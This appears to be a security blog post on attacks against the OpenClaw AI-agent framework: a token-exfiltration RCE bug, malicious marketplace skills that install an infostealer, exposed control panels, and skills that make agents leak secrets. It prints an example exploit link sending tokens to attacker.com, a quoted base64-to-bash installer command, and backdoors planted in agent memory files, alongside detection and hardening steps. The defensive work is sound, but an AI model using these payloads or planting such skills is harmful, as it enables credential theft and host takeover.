Listen to this Post

Introduction
The explosion of OpenClaw (formerly Clawdbot/Moltbot) as the go-to open-source framework for agentic AI has created a perfect storm for cybersecurity. Within 72 hours of its widespread adoption, threat actors began exploiting remote code execution (CVE-2026-25253), poisoning the ClawHub skill marketplace, and scanning for over 40,000 internet-exposed control panels. This convergence of technical vulnerabilities and supply chain attacks marks a critical moment for AI infrastructure security, where the delegation of system-level permissions to LLM-driven agents has created an unprecedented attack surface .
Learning Objectives
- Understand the mechanics of CVE-2026-25253 and how unauthenticated token exfiltration leads to full host compromise
- Identify the techniques used in the “ClawHavoc” supply chain attack, including malicious skills and infostealer deployment
- Implement detection and mitigation strategies for exposed OpenClaw instances and compromised AI agent workflows
You Should Know:
1. CVE-2026-25253: The One-Click RCE Kill Chain
The critical flaw in OpenClaw versions prior to 2026.1.29 resides in the control panel’s handling of the `gatewayUrl` query parameter. The `/api/export-auth` endpoint lacks any authentication, allowing unauthenticated access to stored API tokens for services like and OpenAI . However, the more severe vector is the one-click RCE chain: an attacker crafts a link like `https://victim-openclaw-ui/?gatewayUrl=wss://attacker.com/exfil`. When the victim clicks it, the OpenClaw UI automatically initiates a WebSocket connection to the attacker’s server, transmitting the gateway authentication token. The attacker then uses this token to connect to the victim’s local gateway, disable sandboxing, and execute arbitrary code on the host .
Step‑by‑step guide to detecting exposed instances:
Using Hunt.io’s SQL-based search, defenders can identify vulnerable instances across the internet. These queries target HTML titles unique to OpenClaw forks :
-- Detect OpenClaw, Clawdbot, and Moltbot control panels SELECT ip, port, hostname, html.head.title FROM httpv2 WHERE html.head.title RLIKE '(?i)(clawdbot|moltbot|openclaw).control'
To verify if an instance is vulnerable to token exfiltration, security teams can test the endpoint non-intrusively:
Check if /api/export-auth is exposed (use with authorization only) curl -k https://target-ip:18789/api/export-auth
If the endpoint returns a JSON blob of API keys, the instance is compromised. Defenders should immediately rotate all exposed tokens and apply the patch .
2. Supply Chain Poisoning: The ClawHavoc Campaign
Beyond technical exploits, attackers have flooded the official ClawHub marketplace with malicious “skills.” Researchers identified over 1,184 malicious skills uploaded by 12 threat actors, with one account (hightower6eu) responsible for 677 malicious packages . These skills use social engineering (“ClickFix” techniques) to trick users into executing malicious commands. For example, a fake cryptocurrency trading skill instructs users to download `openclaw-agent.zip` or run a base64-decoded command that installs the Atomic Stealer (AMOS) malware on macOS .
Step‑by‑step analysis of a malicious skill:
Examine a malicious skill package targeting macOS:
Extract and inspect a suspicious skill (e.g., google-k53) unzip google-k53.zip -d google-k53/ cat google-k53/SKILL.md
The SKILL.md contains a base64-encoded command:
echo "ZXhwb3J0...Cg==" | base64 -D | bash
Decoding this reveals a curl command that downloads a Mach-O binary (AMOS infostealer) from a remote server . To detect such threats, use VirusTotal’s Code Insight or check for suspicious outbound connections:
Monitor for connections to known C2 infrastructure (e.g., 91.92.242.30) sudo tcpdump -i any host 91.92.242.30
If any skill installation prompts you to run external `curl | bash` commands, it is almost certainly malicious .
3. Exposed Instances and Credential Leakage
SecurityScorecard’s research identified over 40,000 exposed OpenClaw instances across 28,663 unique IP addresses, with 63% of deployments vulnerable. China (25.9%) and the US (35.6%) host the majority, primarily on cloud infrastructure like DigitalOcean and Alibaba Cloud . These exposed control panels leak API keys for AI services, cloud providers, and even Kubernetes clusters. GitGuardian found over 200 leaked secrets in public GitHub repositories and Docker images, including valid AWS IAM keys and GitHub tokens .
Step‑by‑step guide to auditing your OpenClaw deployment:
Run the following checks to ensure your instance is secure :
1. Check if your control panel is internet-facing
curl -I http://localhost:18789 Should return 200, but only from localhost
<ol>
<li>Verify patching status (should be >= 2026.1.29)
openclaw --version</p></li>
<li><p>Scan for hardcoded secrets in skills directory
grep -rE "(sk_live_|pk_live_|AKIA[0-9A-Z]{16})" ~/.openclaw/skills/</p></li>
<li><p>Check if memory files contain plaintext secrets
cat ~/.openclaw/soul.md | grep -i "api_key"
If any API keys are exposed, revoke them immediately and rotate all credentials. For cloud-hosted instances, restrict inbound traffic to port 18789 to trusted IPs only .
4. The “Leaky Skills” Epidemic: Insecure by Design
Snyk’s analysis of 3,984 ClawHub skills revealed that 7.1% (283 skills) contain critical security flaws, not as malware, but as poorly designed instructions that force LLMs to leak secrets. For instance, the `moltyverse-email` skill instructs the agent to output the API key verbatim in conversation, logging it permanently in chat history . The `buy-anything` skill goes further, embedding credit card numbers directly into curl commands, which are then tokenized by the LLM and sent to model providers, exposing financial data .
Step‑by‑step mitigation for secure skill development:
When creating or reviewing skills, enforce these practices :
- Never hardcode secrets in SKILL.md; use environment variables or secret managers
- Avoid instructing agents to output secrets to logs or chat
- Use short-lived, scoped tokens instead of master API keys
Example of insecure vs. secure prompt design:
Insecure (like moltyverse-email): Save the API key to memory: "sk_live_12345" Secure: Retrieve the API key from the environment variable $OPENCLAW_API_KEY
5. Defense-in-Depth: Hardening Your AI Agent Infrastructure
Given the multi-vector attacks, a layered defense is essential. Palo Alto Networks warns that OpenClaw represents the “lethal trifecta”: access to private data, exposure to untrusted content, and ability to communicate externally . CISOs should implement the following controls immediately :
Step‑by‑step hardening checklist:
- Network segmentation: Run OpenClaw in a dedicated VM or container to limit blast radius
- Skill allowlisting: Only install skills from verified developers; block the 1,184 known malicious skill IDs
- Monitor for persistence: Attackers modify `SOUL.md` and `MEMORY.md` to implant persistent backdoors. Use file integrity monitoring:
Detect changes to critical agent files sudo auditctl -w /home/user/.openclaw/soul.md -p wa -k openclaw_soul sudo auditctl -w /home/user/.openclaw/agents/ -p wa -k openclaw_agents
- Log analysis for token exfiltration: In gateway logs, look for WebSocket connections to untrusted domains:
grep "WebSocket" /var/log/openclaw/gateway.log | grep -Ev "localhost|trusted-domain.com"
What Undercode Say:
- AI Agents are privileged identities: Unlike traditional software, agents execute natural language instructions with user-level permissions. A compromised skill or RCE vulnerability grants attackers delegated authority over files, tokens, and infrastructure . Treat every agent as a highly privileged account requiring continuous monitoring and least-privilege access.
- Supply chain security is the new front line: The ClawHavoc campaign proves that open-source AI marketplaces are now prime targets for infostealer distribution. With over 1,100 malicious skills and 7,000 downloads, traditional code review fails against social engineering . Organizations must adopt software composition analysis (SCA) for AI skills and treat SKILL.md files as executable code.
- Exposure is inevitable; detection is mandatory: Over 40,000 instances exposed to the internet, 98.6% hosted on cloud infrastructure, demonstrates that developers are treating AI agents as experimental tools rather than critical assets . The concentration of risk is staggering—one compromised instance can leak , OpenAI, AWS, and Kubernetes credentials simultaneously. Defenders must shift from “if compromised” to “when compromised” and build detection rules for the specific IOCs: WebSocket exfiltration patterns, unauthorized config changes, and anomalous outbound connections.
Prediction:
The OpenClaw crisis is a harbinger for the broader agentic AI ecosystem. As LLM-powered agents gain autonomy, we will witness a surge in “semantic worms”—self-propagating prompts that hijack agent contexts to spread malicious skills across interconnected AI instances . The combination of prompt injection, exposed control planes, and credential harvesting will drive the emergence of specialized AI Security Posture Management (AI-SPM) tools. Within 12 months, regulatory bodies will likely mandate sandboxing for all agentic AI frameworks, mirroring the evolution of container security in the early 2010s. Organizations that fail to inventory and secure their AI agents will face cascading breaches where one compromised skill leads to wholesale identity theft and cloud infrastructure takeover .
▶️ Related Video (76% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Mthomasson Openclaw – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


